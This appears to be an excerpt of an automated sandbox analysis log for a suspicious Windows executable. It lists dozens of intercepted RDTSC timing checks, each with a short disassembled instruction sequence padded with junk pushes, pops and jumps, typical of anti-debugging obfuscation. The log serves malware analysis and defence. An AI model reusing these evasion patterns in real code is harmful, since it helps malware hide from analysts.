Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F6895E second address: F68A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FB8E4E1E3B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D364Ch], edi 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov bx, cx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007FB8E4E1E3B8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D1C09h], edx 0x0000005e jmp 00007FB8E4E1E3BBh 0x00000063 mov eax, dword ptr [ebp+122D115Dh] 0x00000069 jnp 00007FB8E4E1E3C8h 0x0000006f push FFFFFFFFh 0x00000071 mov bh, F1h 0x00000073 nop 0x00000074 pushad 0x00000075 jmp 00007FB8E4E1E3C8h 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FB8E4E1E3C9h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F69A52 second address: F69A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F6F0EB second address: F6F0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F74183 second address: F74193 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007FB8E4E1A516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F738CC second address: F738D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F738D0 second address: F738E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81D51 second address: F81D86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1E3C6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 jns 00007FB8E4E1E3B8h 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81D86 second address: F81DA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FB8E4E1A51Dh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81E92 second address: F81EA8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FB8E4E1E3B8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81EA8 second address: F81F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1A51Dh 0x00000008 jmp 00007FB8E4E1A51Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 je 00007FB8E4E1A535h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f jmp 00007FB8E4E1A522h 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81F06 second address: F81F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81F0C second address: F81F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81F10 second address: F81F25 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81F25 second address: F81F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F81F2E second address: F81F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F88034 second address: F88038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8820B second address: F88215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB8E4E1E3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F88215 second address: F8823A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB8E4E1A520h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jl 00007FB8E4E1A516h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8823A second address: F88278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BCh 0x00000007 jnl 00007FB8E4E1E3B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FB8E4E1E3C8h 0x00000014 jmp 00007FB8E4E1E3BDh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F88811 second address: F8881B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8E4E1A516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F88AB5 second address: F88ABF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1E3BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D217 second address: F8D229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FB8E4E1A516h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D229 second address: F8D22D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D4F6 second address: F8D50B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A521h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D50B second address: F8D511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D511 second address: F8D516 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D516 second address: F8D51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D51C second address: F8D525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D525 second address: F8D529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D529 second address: F8D52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8D9B9 second address: F8D9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BBh 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007FB8E4E1E3B6h 0x00000011 jo 00007FB8E4E1E3B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F0D7D1 second address: F0D7D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F0D7D6 second address: F0D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8E335 second address: F8E350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FB8E4E1A51Ch 0x0000000b jng 00007FB8E4E1A516h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FB8E4E1A516h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F8E350 second address: F8E354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F920AC second address: F920E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8E4E1A516h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 popad 0x00000014 jnp 00007FB8E4E1A538h 0x0000001a pushad 0x0000001b jmp 00007FB8E4E1A524h 0x00000020 push eax 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F952CD second address: F952E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pushad 0x00000008 jg 00007FB8E4E1E3B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9B550 second address: F9B560 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9B560 second address: F9B564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A386 second address: F9A3A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A3A3 second address: F9A3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A3AE second address: F9A3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A51Eh 0x00000009 pop edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A4C0 second address: F9A4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8E4E1E3C8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A4F2 second address: F9A4F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A4F6 second address: F9A506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FB8E4E1E3B6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9A863 second address: F9A867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9AA17 second address: F9AA2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB8E4E1E3BDh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9AA2C second address: F9AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8E4E1A516h 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9AA3D second address: F9AA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9AA56 second address: F9AA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F99F3C second address: F99F49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FB8E4E1E3B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F99F49 second address: F99F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F99F55 second address: F99F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9AD00 second address: F9AD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9AE65 second address: F9AE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9FA93 second address: F9FAA1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8E4E1A518h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9FAA1 second address: F9FAA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9FAA5 second address: F9FAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FB8E4E1A522h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9FAB6 second address: F9FAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8E4E1E3B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9FAC6 second address: F9FACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F14269 second address: F1426D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F1426D second address: F14294 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8E4E1A529h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F14294 second address: F14298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4E9C1 second address: F4E9C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4EEDF second address: F4EF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1E3BFh 0x00000008 jmp 00007FB8E4E1E3C7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FB8E4E1E3C7h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jnp 00007FB8E4E1E3B8h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4EF34 second address: F4EF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pop eax 0x00000009 call 00007FB8E4E1A519h 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 je 00007FB8E4E1A51Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4EF55 second address: F4EFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push edx 0x00000008 jmp 00007FB8E4E1E3C8h 0x0000000d pop edx 0x0000000e pushad 0x0000000f jnc 00007FB8E4E1E3B6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007FB8E4E1E3C2h 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 pushad 0x00000026 jmp 00007FB8E4E1E3BAh 0x0000002b push edx 0x0000002c pop edx 0x0000002d popad 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 pop edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4F3D7 second address: F4F402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D3689h], edi 0x0000000c push 00000004h 0x0000000e sub dword ptr [ebp+122D30E4h], ebx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FB8E4E1A51Ch 0x0000001d jc 00007FB8E4E1A516h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4F79E second address: F4F7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4F7A4 second address: F4F7BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB8E4E1A532h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FB8E4E1A516h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FAC1 second address: F4FAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FAC5 second address: F4FAD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FAD2 second address: F4FB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8E4E1E3B6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB8E4E1E3C0h 0x00000015 jmp 00007FB8E4E1E3BEh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FBF8 second address: F4FBFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FBFE second address: F4FC22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jg 00007FB8E4E1E3C2h 0x00000012 jg 00007FB8E4E1E3BCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FC22 second address: F4FC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push esi 0x00000008 call 00007FB8E4E1A518h 0x0000000d pop esi 0x0000000e mov dword ptr [esp+04h], esi 0x00000012 add dword ptr [esp+04h], 0000001Ch 0x0000001a inc esi 0x0000001b push esi 0x0000001c ret 0x0000001d pop esi 0x0000001e ret 0x0000001f mov dword ptr [ebp+12464A61h], ecx 0x00000025 lea eax, dword ptr [ebp+1247860Ch] 0x0000002b mov edi, dword ptr [ebp+122D2B2Bh] 0x00000031 jmp 00007FB8E4E1A523h 0x00000036 nop 0x00000037 push esi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4FC75 second address: F4FCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB8E4E1E3B6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d jng 00007FB8E4E1E3BEh 0x00000013 jo 00007FB8E4E1E3B8h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FB8E4E1E3B8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov ecx, dword ptr [ebp+122D28BBh] 0x0000003c lea eax, dword ptr [ebp+124785C8h] 0x00000042 mov di, 3FBBh 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jnl 00007FB8E4E1E3B6h 0x00000050 pushad 0x00000051 popad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9EB93 second address: F9EBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A523h 0x00000009 rdtsc
